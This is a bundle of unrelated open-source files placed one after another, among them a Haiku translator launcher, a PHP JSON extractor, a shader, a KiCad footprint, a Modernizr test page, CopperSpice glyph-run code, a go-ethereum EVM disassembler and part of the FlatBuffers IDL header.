/*
* Copyright 2005-2006, Axel Dörfler, [email protected]. All rights reserved.
* Distributed under the terms of the MIT License.
*/
#include "EXRTranslator.h"
#include "TranslatorWindow.h"
#include <Application.h>
#include <Catalog.h>
#undef B_TRANSLATION_CONTEXT
#define B_TRANSLATION_CONTEXT "main"
int
main(int /*argc*/, char **/*argv*/)
{
BApplication app("application/x-vnd.Haiku-EXRTranslator");
status_t result;
result = LaunchTranslatorWindow(new EXRTranslator,
B_TRANSLATE("EXR Settings"));
if (result != B_OK)
return 1;
app.Run();
return 0;
}
<?php
namespace Rubix\ML\Extractors;
use InvalidArgumentException;
use RuntimeException;
use Generator;
use function is_null;
/**
* JSON
*
* JavaScript Object Notation is a standardized, lightweight plain-text representation that
* is widely used. JSON has the advantage of retaining type information; however, since the
* entire JSON blob is read on load, it is not cursorable like CSV or NDJSON.
*
* References:
* [1] T. Bray. (2014). The JavaScript Object Notation (JSON) Data Interchange Format.
*
* @category Machine Learning
* @package Rubix/ML
* @author Andrew DalPino
*/
class JSON implements Extractor
{
/**
* The path to the JSON file.
*
* @var string
*/
protected $path;
/**
* @param string $path
* @throws \InvalidArgumentException
*/
public function __construct(string $path)
{
if (!is_file($path)) {
throw new InvalidArgumentException("Path $path does not exist.");
}
if (!is_readable($path)) {
throw new InvalidArgumentException("Path $path is not readable.");
}
$this->path = $path;
}
/**
* Return an iterator for the records in the data table.
*
* @throws \RuntimeException
* @return \Generator<mixed[]>
*/
public function getIterator() : Generator
{
$data = file_get_contents($this->path);
if ($data === false) {
throw new RuntimeException("Could not read $this->path.");
}
$records = json_decode($data, true);
if (is_null($records)) {
throw new RuntimeException('Malformed JSON document.');
}
yield from $records;
}
}
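// Example usage (a minimal sketch, not shipped with the library; the file path
// is hypothetical). Assuming the Extractor interface extends IteratorAggregate,
// the decoded records can be traversed with a plain foreach loop:
//
//     $extractor = new JSON('example.json');
//
//     foreach ($extractor as $record) {
//         // $record is one decoded row, typically an associative array
//     }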
#version 450
layout (location = 0) in vec3 inNormal;
layout (location = 1) in vec2 inUV;
layout (location = 2) in vec3 inViewVec;
layout (location = 3) in vec3 inLightVec;
layout (location = 0) out vec4 outFragColor;
void main()
{
vec3 N = normalize(inNormal);
vec3 L = normalize(inLightVec);
vec3 V = normalize(inViewVec);
vec3 R = reflect(-L, N);
float diffuse = max(dot(N, L), 0.0);
float specular = pow(max(dot(R, V), 0.0), 1.0);
outFragColor = vec4(vec3(diffuse + specular) * vec3(0.25), 1.0);
}
package mirror.android.rms.resource;
import mirror.RefClass;
import mirror.RefObject;
public class ReceiverResourceM {
public static Class<?> TYPE = RefClass.load(ReceiverResourceM.class, "android.rms.resource.ReceiverResource");
public static RefObject<String[]> mWhiteList;
}
{
"images": [
{
"filename": "ic_control_point_duplicate_36pt.png",
"idiom": "universal",
"scale": "1x"
},
{
"filename": "ic_control_point_duplicate_36pt_2x.png",
"idiom": "universal",
"scale": "2x"
},
{
"filename": "ic_control_point_duplicate_36pt_3x.png",
"idiom": "universal",
"scale": "3x"
}
],
"info": {
"author": "xcode",
"version": 1
}
}
(module Buzzer_12x9.5RM7.6_RM5.0 (layer F.Cu) (tedit 54D86C8B)
(descr "Generic Buzzer, D12mm height 9.5mm with RM7.6mm")
(tags buzzer)
(fp_text reference SP1 (at -0.254 -3.429 90) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value SPEAKER (at 7.366 0.381 90) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_circle (center 0 0) (end 1.00076 0) (layer F.SilkS) (width 0.15))
(fp_text user + (at 3.1496 -2.4384) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_circle (center 0 0) (end 6.20014 0) (layer F.SilkS) (width 0.15))
(pad 1 thru_hole circle (at -3.79984 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(pad 2 thru_hole circle (at 3.79984 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(pad 1 thru_hole circle (at -2.54 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(pad 2 thru_hole circle (at 2.54 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(model Buzzers_Beepers.3dshapes/Buzzer_12x9.5RM7.6.wrl
(at (xyz 0 0 0))
(scale (xyz 4 4 4))
(rotate (xyz 0 0 0))
)
)
<!DOCTYPE html>
<html class="+no-js no-js- no-js i-has-no-js">
<head>
<meta charset="UTF-8">
<title>Modernizr Test Suite</title>
<link rel="stylesheet" href="qunit/qunit.css">
<style>
body { margin-bottom: 150px;}
#testbed { font-family: Helvetica; color: #444; padding-bottom: 100px;}
#testbed button { margin: 30px; font-size: 13px;}
.data-notes, .offScreen { display:none;}
table { width: 100%;}
tbody tr:nth-child(even) td, tbody tr:nth-child(even) th { border: 1px solid #ccc; border-left: 0; border-right: 0;}
table td:nth-child(even), table th:nth-child(even) { background: #e6e6e6;}
table tbody tr:hover td, table tbody tr:hover th { background: #e1e100!important;}
td.wrong { background:red!important;}
#html5section { visibility: hidden; }
h1 label { display:none;}
.output { padding: 0 0 0 16px;}
.output ul { margin: 0;}
.output li { color: #854747; }
.output li.yes{color:#090;}
.output li b{color:#000;}
.output {font:14px/1.3 Inconsolata,Consolas,monospace;
-webkit-column-count: 5;
-moz-column-count: 5;
column-count: 5;}
.output + .output { border-top: 5px solid #ccc; }
textarea { width: 100%; min-height: 75px;}
#caniusetrigger { font-size: 38px; font-family: monospace; display:block; }
</style>
<script>window.Modernizr || document.write('<script src="../modernizr.js"><\/script>')</script>
<script src="https://raw.github.com/Modernizr/Modernizr/master/modernizr.js"></script>
<script src="js/lib/polyfills.js"></script>
<script src="js/lib/detect-global.js"></script>
<script src="qunit/qunit.js"></script>
<script src="js/lib/jquery-1.7b2.js"></script>
<script src="js/lib/jsonselect.js"></script>
<script src="js/lib/uaparser.js"></script>
<script src="js/lib/github.js"></script>
<script src="js/setup.js"></script>
<script src="js/unit.js"></script>
<script src="js/unit-caniuse.js"></script>
</head>
<body>
<h1 id="qunit-header">Modernizr Test Suite</h1>
<h2 id="qunit-banner"></h2>
<div id="qunit-testrunner-toolbar"></div>
<h2 id="qunit-userAgent"></h2>
<ol id="qunit-tests"></ol>
<div id="mod-output" class=output></div>
<div id="mod-feattest-output" class=output></div>
<br>
<section><aside>this is an aside within a section</aside></section>
<h5>JSON.stringify(Modernizr)</h5>
<textarea></textarea>
<a href="#" id="caniusetrigger"
onclick="return revealreftests(this)"
title="add a #caniuse hash to this page to make this automatic"
>Show the Ref Tests from Caniuse and Modernizr</a>
<script src="js/dumpdata.js"></script>
<script>
function revealreftests(a){
if (!a) a = document.getElementById('caniusetrigger');
a.parentNode && a.parentNode.removeChild(a);
var iframe = document.createElement('iframe');
iframe.src = 'caniuse.html';
iframe.style.cssText = 'width: 100%; height: 7000px; border: 15px double #F0C; \
-moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box; ';
document.body.appendChild(iframe);
return false;
}
if (location.hash.replace(/^#/,'') == 'caniuse'){
setTimeout(revealreftests, 100);
}
</script>
</body>
</html>
/***********************************************************************
*
* Copyright (c) 2012-2020 Barbara Geller
* Copyright (c) 2012-2020 Ansel Sermersheim
*
* Copyright (c) 2015 The Qt Company Ltd.
* Copyright (c) 2012-2016 Digia Plc and/or its subsidiary(-ies).
* Copyright (c) 2008-2012 Nokia Corporation and/or its subsidiary(-ies).
*
* This file is part of CopperSpice.
*
* CopperSpice is free software. You can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* version 2.1 as published by the Free Software Foundation.
*
* CopperSpice is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* https://www.gnu.org/licenses/
*
***********************************************************************/
#include <qglobal.h>
#include <qglyphrun.h>
#include <qglyphrun_p.h>
QGlyphRun::QGlyphRun() : d(new QGlyphRunPrivate)
{
}
QGlyphRun::QGlyphRun(const QGlyphRun &other)
{
d = other.d;
}
QGlyphRun::~QGlyphRun()
{
// Required for QExplicitlySharedDataPointer
}
/*!
\internal
*/
void QGlyphRun::detach()
{
if (d->ref.load() != 1) {
d.detach();
}
}
QGlyphRun &QGlyphRun::operator=(const QGlyphRun &other)
{
d = other.d;
return *this;
}
bool QGlyphRun::operator==(const QGlyphRun &other) const
{
if (d == other.d) {
return true;
}
if ((d->glyphIndexDataSize != other.d->glyphIndexDataSize)
|| (d->glyphPositionDataSize != other.d->glyphPositionDataSize)) {
return false;
}
if (d->glyphIndexData != other.d->glyphIndexData) {
for (int i = 0; i < d->glyphIndexDataSize; ++i) {
if (d->glyphIndexData[i] != other.d->glyphIndexData[i]) {
return false;
}
}
}
if (d->glyphPositionData != other.d->glyphPositionData) {
for (int i = 0; i < d->glyphPositionDataSize; ++i) {
if (d->glyphPositionData[i] != other.d->glyphPositionData[i]) {
return false;
}
}
}
return (d->flags == other.d->flags && d->rawFont == other.d->rawFont);
}
QRawFont QGlyphRun::rawFont() const
{
return d->rawFont;
}
void QGlyphRun::setRawFont(const QRawFont &rawFont)
{
detach();
d->rawFont = rawFont;
}
QVector<quint32> QGlyphRun::glyphIndexes() const
{
if (d->glyphIndexes.constData() == d->glyphIndexData) {
return d->glyphIndexes;
} else {
QVector<quint32> indexes(d->glyphIndexDataSize);
memcpy(indexes.data(), d->glyphIndexData, d->glyphIndexDataSize * sizeof(quint32));
return indexes;
}
}
void QGlyphRun::setGlyphIndexes(const QVector<quint32> &glyphIndexes)
{
detach();
d->glyphIndexes = glyphIndexes; // Keep a reference to the QVector to avoid copying
d->glyphIndexData = glyphIndexes.constData();
d->glyphIndexDataSize = glyphIndexes.size();
}
/*!
Returns the position of the edge of the baseline for each glyph in this set of glyph indexes.
*/
QVector<QPointF> QGlyphRun::positions() const
{
if (d->glyphPositions.constData() == d->glyphPositionData) {
return d->glyphPositions;
} else {
QVector<QPointF> glyphPositions(d->glyphPositionDataSize);
memcpy(glyphPositions.data(), d->glyphPositionData,
d->glyphPositionDataSize * sizeof(QPointF));
return glyphPositions;
}
}
/*!
Sets the positions of the edge of the baseline for each glyph in this set of glyph indexes to
\a positions.
*/
void QGlyphRun::setPositions(const QVector<QPointF> &positions)
{
detach();
d->glyphPositions = positions; // Keep a reference to the vector to avoid copying
d->glyphPositionData = positions.constData();
d->glyphPositionDataSize = positions.size();
}
/*!
Clears all data in the QGlyphRun object.
*/
void QGlyphRun::clear()
{
detach();
d->rawFont = QRawFont();
d->flags = 0;
setPositions(QVector<QPointF>());
setGlyphIndexes(QVector<quint32>());
}
/*!
Sets the glyph indexes and positions of this QGlyphRun to use the first \a size
elements in the arrays \a glyphIndexArray and \a glyphPositionArray. The data is
\e not copied. The caller must guarantee that the arrays are not deleted as long
as this QGlyphRun and any copies of it exists.
\sa setGlyphIndexes(), setPositions()
*/
void QGlyphRun::setRawData(const quint32 *glyphIndexArray, const QPointF *glyphPositionArray,
int size)
{
detach();
d->glyphIndexes.clear();
d->glyphPositions.clear();
d->glyphIndexData = glyphIndexArray;
d->glyphPositionData = glyphPositionArray;
d->glyphIndexDataSize = d->glyphPositionDataSize = size;
}
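/*
    Example (a minimal sketch, not part of CopperSpice; the glyph indexes and
    positions are arbitrary). The static arrays satisfy the lifetime requirement
    described above, since they outlive any QGlyphRun that references them:

    static const quint32 glyphIndexes[] = { 10, 11, 12 };
    static const QPointF glyphPositions[] = { QPointF(0, 0), QPointF(12, 0), QPointF(24, 0) };

    QGlyphRun run;
    run.setRawData(glyphIndexes, glyphPositions, 3);
*/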
/*!
Returns true if this QGlyphRun should be painted with an overline decoration.
\sa setOverline()
*/
bool QGlyphRun::overline() const
{
return d->flags & Overline;
}
/*!
Indicates that this QGlyphRun should be painted with an overline decoration if \a overline is true.
Otherwise the QGlyphRun should be painted with no overline decoration.
\sa overline()
*/
void QGlyphRun::setOverline(bool overline)
{
setFlag(Overline, overline);
}
/*!
Returns true if this QGlyphRun should be painted with an underline decoration.
\sa setUnderline()
*/
bool QGlyphRun::underline() const
{
return d->flags & Underline;
}
/*!
Indicates that this QGlyphRun should be painted with an underline decoration if \a underline is
true. Otherwise the QGlyphRun should be painted with no underline decoration.
\sa underline()
*/
void QGlyphRun::setUnderline(bool underline)
{
setFlag(Underline, underline);
}
/*!
Returns true if this QGlyphRun should be painted with a strike out decoration.
\sa setStrikeOut()
*/
bool QGlyphRun::strikeOut() const
{
return d->flags & StrikeOut;
}
/*!
Indicates that this QGlyphRun should be painted with a strike out decoration if \a strikeOut is
true. Otherwise the QGlyphRun should be painted with no strike out decoration.
\sa strikeOut()
*/
void QGlyphRun::setStrikeOut(bool strikeOut)
{
setFlag(StrikeOut, strikeOut);
}
bool QGlyphRun::isRightToLeft() const
{
return d->flags & RightToLeft;
}
void QGlyphRun::setRightToLeft(bool rightToLeft)
{
setFlag(RightToLeft, rightToLeft);
}
QGlyphRun::GlyphRunFlags QGlyphRun::flags() const
{
return d->flags;
}
void QGlyphRun::setFlag(GlyphRunFlag flag, bool enabled)
{
if (d->flags.testFlag(flag) == enabled) {
return;
}
detach();
if (enabled) {
d->flags |= flag;
} else {
d->flags &= ~flag;
}
}
void QGlyphRun::setFlags(GlyphRunFlags flags)
{
if (d->flags == flags) {
return;
}
detach();
d->flags = flags;
}
void QGlyphRun::setBoundingRect(const QRectF &boundingRect)
{
detach();
d->boundingRect = boundingRect;
}
QRectF QGlyphRun::boundingRect() const
{
if (!d->boundingRect.isEmpty() || !d->rawFont.isValid()) {
return d->boundingRect;
}
qreal minX, minY, maxX, maxY;
minX = minY = maxX = maxY = 0;
for (int i = 0, n = qMin(d->glyphIndexDataSize, d->glyphPositionDataSize); i < n; ++i) {
QRectF glyphRect = d->rawFont.boundingRect(d->glyphIndexData[i]);
glyphRect.translate(d->glyphPositionData[i]);
if (i == 0) {
minX = glyphRect.left();
minY = glyphRect.top();
maxX = glyphRect.right();
maxY = glyphRect.bottom();
} else {
minX = qMin(glyphRect.left(), minX);
minY = qMin(glyphRect.top(), minY);
maxX = qMax(glyphRect.right(), maxX);
maxY = qMax(glyphRect.bottom(), maxY);
}
}
return QRectF(QPointF(minX, minY), QPointF(maxX, maxY));
}
bool QGlyphRun::isEmpty() const
{
return d->glyphIndexDataSize == 0;
}
/*
Real-time Online/Offline Charging System (OCS) for Telecom & ISP environments
Copyright (C) ITsysCOM GmbH
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package console
import "github.com/cgrates/cgrates/utils"
func init() {
c := &CmdStatus{
name: "status",
rpcMethod: utils.CoreSv1Status,
}
commands[c.Name()] = c
c.CommandExecuter = &CommandExecuter{c}
}
type CmdStatus struct {
name string
rpcMethod string
rpcParams *utils.TenantWithOpts
*CommandExecuter
}
func (self *CmdStatus) Name() string {
return self.name
}
func (self *CmdStatus) RpcMethod() string {
return self.rpcMethod
}
func (self *CmdStatus) RpcParams(reset bool) interface{} {
if reset || self.rpcParams == nil {
self.rpcParams = &utils.TenantWithOpts{
Opts: make(map[string]interface{}),
}
}
return self.rpcParams
}
func (self *CmdStatus) PostprocessRpcParams() error {
return nil
}
func (self *CmdStatus) RpcResult() interface{} {
var s map[string]interface{}
return &s
}
func (self *CmdStatus) ClientArgs() (args []string) {
return
}
// Copyright 2017 The go-ethereum Authors
// This file is part of the go-ethereum library.
//
// The go-ethereum library is free software: you can redistribute it and/or modify
// it under the terms of the GNU Lesser General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// The go-ethereum library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Lesser General Public License for more details.
//
// You should have received a copy of the GNU Lesser General Public License
// along with the go-ethereum library. If not, see <http://www.gnu.org/licenses/>.
// Provides support for dealing with EVM assembly instructions (e.g., disassembling them).
package asm
import (
"encoding/hex"
"fmt"
"github.com/ethereum/go-ethereum/core/vm"
)
// Iterator for disassembled EVM instructions
type instructionIterator struct {
code []byte
pc uint64
arg []byte
op vm.OpCode
error error
started bool
}
// Create a new instruction iterator.
func NewInstructionIterator(code []byte) *instructionIterator {
it := new(instructionIterator)
it.code = code
return it
}
// Returns true if there is a next instruction and moves on.
func (it *instructionIterator) Next() bool {
if it.error != nil || uint64(len(it.code)) <= it.pc {
// We previously reached an error or the end.
return false
}
if it.started {
// Since the iteration has been already started we move to the next instruction.
if it.arg != nil {
it.pc += uint64(len(it.arg))
}
it.pc++
} else {
// We start the iteration from the first instruction.
it.started = true
}
if uint64(len(it.code)) <= it.pc {
// We reached the end.
return false
}
it.op = vm.OpCode(it.code[it.pc])
if it.op.IsPush() {
a := uint64(it.op) - uint64(vm.PUSH1) + 1
u := it.pc + 1 + a
if uint64(len(it.code)) <= it.pc || uint64(len(it.code)) < u {
it.error = fmt.Errorf("incomplete push instruction at %v", it.pc)
return false
}
it.arg = it.code[it.pc+1 : u]
} else {
it.arg = nil
}
return true
}
// Returns any error that may have been encountered.
func (it *instructionIterator) Error() error {
return it.error
}
// Returns the PC of the current instruction.
func (it *instructionIterator) PC() uint64 {
return it.pc
}
// Returns the opcode of the current instruction.
func (it *instructionIterator) Op() vm.OpCode {
return it.op
}
// Returns the argument of the current instruction.
func (it *instructionIterator) Arg() []byte {
return it.arg
}
// Pretty-print all disassembled EVM instructions to stdout.
func PrintDisassembled(code string) error {
script, err := hex.DecodeString(code)
if err != nil {
return err
}
it := NewInstructionIterator(script)
for it.Next() {
if it.Arg() != nil && 0 < len(it.Arg()) {
fmt.Printf("%05x: %v 0x%x\n", it.PC(), it.Op(), it.Arg())
} else {
fmt.Printf("%05x: %v\n", it.PC(), it.Op())
}
}
return it.Error()
}
// Return all disassembled EVM instructions in human-readable format.
func Disassemble(script []byte) ([]string, error) {
instrs := make([]string, 0)
it := NewInstructionIterator(script)
for it.Next() {
if it.Arg() != nil && 0 < len(it.Arg()) {
instrs = append(instrs, fmt.Sprintf("%05x: %v 0x%x\n", it.PC(), it.Op(), it.Arg()))
} else {
instrs = append(instrs, fmt.Sprintf("%05x: %v\n", it.PC(), it.Op()))
}
}
if err := it.Error(); err != nil {
return nil, err
}
return instrs, nil
}
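// Example (a minimal sketch, not part of this package; "60606040" is an
// arbitrary pair of PUSH1 instructions):
//
//	script, _ := hex.DecodeString("60606040")
//	instrs, err := Disassemble(script)
//	if err != nil {
//		return err
//	}
//	for _, ins := range instrs {
//		fmt.Print(ins) // each entry already ends with a newline
//	}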
/*
* Copyright 2014 Google Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef FLATBUFFERS_IDL_H_
#define FLATBUFFERS_IDL_H_
#include <map>
#include <memory>
#include <stack>
#include "flatbuffers/base.h"
#include "flatbuffers/flatbuffers.h"
#include "flatbuffers/flexbuffers.h"
#include "flatbuffers/hash.h"
#include "flatbuffers/reflection.h"
#if !defined(FLATBUFFERS_CPP98_STL)
# include <functional>
#endif // !defined(FLATBUFFERS_CPP98_STL)
// This file defines the data types representing a parsed IDL (Interface
// Definition Language) / schema file.
// Limits maximum depth of nested objects.
// Prevents stack overflow while parsing flatbuffers or JSON.
#if !defined(FLATBUFFERS_MAX_PARSING_DEPTH)
# define FLATBUFFERS_MAX_PARSING_DEPTH 64
#endif
namespace flatbuffers {
// The order of these matters for Is*() functions below.
// Additionally, Parser::ParseType assumes bool..string is a contiguous range
// of type tokens.
// clang-format off
#define FLATBUFFERS_GEN_TYPES_SCALAR(TD) \
TD(NONE, "", uint8_t, byte, byte, byte, uint8, u8, UByte, UInt8) \
TD(UTYPE, "", uint8_t, byte, byte, byte, uint8, u8, UByte, UInt8) /* begin scalar/int */ \
TD(BOOL, "bool", uint8_t, boolean,bool, bool, bool, bool, Boolean, Bool) \
TD(CHAR, "byte", int8_t, byte, int8, sbyte, int8, i8, Byte, Int8) \
TD(UCHAR, "ubyte", uint8_t, byte, byte, byte, uint8, u8, UByte, UInt8) \
TD(SHORT, "short", int16_t, short, int16, short, int16, i16, Short, Int16) \
TD(USHORT, "ushort", uint16_t, short, uint16, ushort, uint16, u16, UShort, UInt16) \
TD(INT, "int", int32_t, int, int32, int, int32, i32, Int, Int32) \
TD(UINT, "uint", uint32_t, int, uint32, uint, uint32, u32, UInt, UInt32) \
TD(LONG, "long", int64_t, long, int64, long, int64, i64, Long, Int64) \
TD(ULONG, "ulong", uint64_t, long, uint64, ulong, uint64, u64, ULong, UInt64) /* end int */ \
TD(FLOAT, "float", float, float, float32, float, float32, f32, Float, Float32) /* begin float */ \
TD(DOUBLE, "double", double, double, float64, double, float64, f64, Double, Double) /* end float/scalar */
#define FLATBUFFERS_GEN_TYPES_POINTER(TD) \
TD(STRING, "string", Offset<void>, int, int, StringOffset, int, unused, Int, Offset<String>) \
TD(VECTOR, "", Offset<void>, int, int, VectorOffset, int, unused, Int, Offset<UOffset>) \
TD(STRUCT, "", Offset<void>, int, int, int, int, unused, Int, Offset<UOffset>) \
TD(UNION, "", Offset<void>, int, int, int, int, unused, Int, Offset<UOffset>)
#define FLATBUFFERS_GEN_TYPE_ARRAY(TD) \
TD(ARRAY, "", int, int, int, int, int, unused, Int, Offset<UOffset>)
// The fields are:
// - enum
// - FlatBuffers schema type.
// - C++ type.
// - Java type.
// - Go type.
// - C# / .Net type.
// - Python type.
// - Rust type.
// - Kotlin type.
// using these macros, we can now write code dealing with types just once, e.g.
/*
switch (type) {
#define FLATBUFFERS_TD(ENUM, IDLTYPE, CTYPE, JTYPE, GTYPE, NTYPE, PTYPE, \
RTYPE, KTYPE) \
case BASE_TYPE_ ## ENUM: \
// do something specific to CTYPE here
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
}
*/
// If not all FLATBUFFERS_GEN_() arguments are necessary for implementation
// of FLATBUFFERS_TD, you can use a variadic macro (with __VA_ARGS__ if needed).
// In the above example, only CTYPE is used to generate the code, it can be rewritten:
/*
switch (type) {
#define FLATBUFFERS_TD(ENUM, IDLTYPE, CTYPE, ...) \
case BASE_TYPE_ ## ENUM: \
// do something specific to CTYPE here
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
}
*/
#define FLATBUFFERS_GEN_TYPES(TD) \
FLATBUFFERS_GEN_TYPES_SCALAR(TD) \
FLATBUFFERS_GEN_TYPES_POINTER(TD) \
FLATBUFFERS_GEN_TYPE_ARRAY(TD)
// Create an enum for all the types above.
#ifdef __GNUC__
__extension__ // Stop GCC complaining about trailing comma with -Wpedantic.
#endif
enum BaseType {
#define FLATBUFFERS_TD(ENUM, ...) \
BASE_TYPE_ ## ENUM,
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
};
#define FLATBUFFERS_TD(ENUM, IDLTYPE, CTYPE, ...) \
static_assert(sizeof(CTYPE) <= sizeof(largest_scalar_t), \
"define largest_scalar_t as " #CTYPE);
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
inline bool IsScalar (BaseType t) { return t >= BASE_TYPE_UTYPE &&
t <= BASE_TYPE_DOUBLE; }
inline bool IsInteger(BaseType t) { return t >= BASE_TYPE_UTYPE &&
t <= BASE_TYPE_ULONG; }
inline bool IsFloat (BaseType t) { return t == BASE_TYPE_FLOAT ||
t == BASE_TYPE_DOUBLE; }
inline bool IsLong (BaseType t) { return t == BASE_TYPE_LONG ||
t == BASE_TYPE_ULONG; }
inline bool IsBool (BaseType t) { return t == BASE_TYPE_BOOL; }
inline bool IsOneByte(BaseType t) { return t >= BASE_TYPE_UTYPE &&
t <= BASE_TYPE_UCHAR; }
inline bool IsUnsigned(BaseType t) {
return (t == BASE_TYPE_UTYPE) || (t == BASE_TYPE_UCHAR) ||
(t == BASE_TYPE_USHORT) || (t == BASE_TYPE_UINT) ||
(t == BASE_TYPE_ULONG);
}
// clang-format on
extern const char *const kTypeNames[];
extern const char kTypeSizes[];
inline size_t SizeOf(BaseType t) { return kTypeSizes[t]; }
struct StructDef;
struct EnumDef;
class Parser;
// Represents any type in the IDL, which is a combination of the BaseType
// and additional information for vectors/structs_.
struct Type {
explicit Type(BaseType _base_type = BASE_TYPE_NONE, StructDef *_sd = nullptr,
EnumDef *_ed = nullptr, uint16_t _fixed_length = 0)
: base_type(_base_type),
element(BASE_TYPE_NONE),
struct_def(_sd),
enum_def(_ed),
fixed_length(_fixed_length) {}
bool operator==(const Type &o) {
return base_type == o.base_type && element == o.element &&
struct_def == o.struct_def && enum_def == o.enum_def;
}
Type VectorType() const {
return Type(element, struct_def, enum_def, fixed_length);
}
Offset<reflection::Type> Serialize(FlatBufferBuilder *builder) const;
bool Deserialize(const Parser &parser, const reflection::Type *type);
BaseType base_type;
BaseType element; // only set if t == BASE_TYPE_VECTOR
StructDef *struct_def; // only set if t or element == BASE_TYPE_STRUCT
EnumDef *enum_def; // set if t == BASE_TYPE_UNION / BASE_TYPE_UTYPE,
// or for an integral type derived from an enum.
uint16_t fixed_length; // only set if t == BASE_TYPE_ARRAY
};
// Represents a parsed scalar value, its type, and field offset.
struct Value {
Value()
: constant("0"),
offset(static_cast<voffset_t>(~(static_cast<voffset_t>(0U)))) {}
Type type;
std::string constant;
voffset_t offset;
};
// Helper class that retains the original order of a set of identifiers and
// also provides quick lookup.
template<typename T> class SymbolTable {
public:
~SymbolTable() {
for (auto it = vec.begin(); it != vec.end(); ++it) { delete *it; }
}
bool Add(const std::string &name, T *e) {
vector_emplace_back(&vec, e);
auto it = dict.find(name);
if (it != dict.end()) return true;
dict[name] = e;
return false;
}
void Move(const std::string &oldname, const std::string &newname) {
auto it = dict.find(oldname);
if (it != dict.end()) {
auto obj = it->second;
dict.erase(it);
dict[newname] = obj;
} else {
FLATBUFFERS_ASSERT(false);
}
}
T *Lookup(const std::string &name) const {
auto it = dict.find(name);
return it == dict.end() ? nullptr : it->second;
}
public:
std::map<std::string, T *> dict; // quick lookup
std::vector<T *> vec; // Used to iterate in order of insertion
};
// A name space, as set in the schema.
struct Namespace {
Namespace() : from_table(0) {}
// Given a (potentially unqualified) name, return the "fully qualified" name
// which has a full namespaced descriptor.
// With max_components you can request less than the number of components
// the current namespace has.
std::string GetFullyQualifiedName(const std::string &name,
size_t max_components = 1000) const;
std::vector<std::string> components;
size_t from_table; // Part of the namespace corresponds to a message/table.
};
inline bool operator<(const Namespace &a, const Namespace &b) {
size_t min_size = std::min(a.components.size(), b.components.size());
for (size_t i = 0; i < min_size; ++i) {
if (a.components[i] != b.components[i])
return a.components[i] < b.components[i];
}
return a.components.size() < b.components.size();
}
// Base class for all definition types (fields, structs_, enums_).
struct Definition {
Definition()
: generated(false),
defined_namespace(nullptr),
serialized_location(0),
index(-1),
refcount(1) {}
flatbuffers::Offset<
flatbuffers::Vector<flatbuffers::Offset<reflection::KeyValue>>>
SerializeAttributes(FlatBufferBuilder *builder, const Parser &parser) const;
bool DeserializeAttributes(Parser &parser,
const Vector<Offset<reflection::KeyValue>> *attrs);
std::string name;
std::string file;
std::vector<std::string> doc_comment;
SymbolTable<Value> attributes;
bool generated; // did we already output code for this definition?
Namespace *defined_namespace; // Where it was defined.
// For use with Serialize()
uoffset_t serialized_location;
int index; // Inside the vector it is stored.
int refcount;
};
struct FieldDef : public Definition {
FieldDef()
: deprecated(false),
required(false),
key(false),
shared(false),
native_inline(false),
flexbuffer(false),
nested_flatbuffer(NULL),
padding(0) {}
Offset<reflection::Field> Serialize(FlatBufferBuilder *builder, uint16_t id,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Field *field);
Value value;
bool deprecated; // Field is allowed to be present in old data, but can't be
// written in new data nor accessed in new code.
bool required; // Field must always be present.
bool key; // Field functions as a key for creating sorted vectors.
bool shared; // Field will be using string pooling (i.e. CreateSharedString)
// as default serialization behavior if field is a string.
bool native_inline; // Field will be defined inline (instead of as a pointer)
// for native tables if field is a struct.
bool flexbuffer; // This field contains FlexBuffer data.
StructDef *nested_flatbuffer; // This field contains nested FlatBuffer data.
size_t padding; // Bytes to always pad after this field.
};
struct StructDef : public Definition {
StructDef()
: fixed(false),
predecl(true),
sortbysize(true),
has_key(false),
minalign(1),
bytesize(0) {}
void PadLastField(size_t min_align) {
auto padding = PaddingBytes(bytesize, min_align);
bytesize += padding;
if (fields.vec.size()) fields.vec.back()->padding = padding;
}
Offset<reflection::Object> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Object *object);
SymbolTable<FieldDef> fields;
bool fixed; // If it's struct, not a table.
bool predecl; // If it's used before it was defined.
bool sortbysize; // Whether fields come in the declaration or size order.
bool has_key; // It has a key field.
size_t minalign; // What the whole object needs to be aligned to.
size_t bytesize; // Size if fixed.
flatbuffers::unique_ptr<std::string> original_location;
};
struct EnumDef;
struct EnumValBuilder;
struct EnumVal {
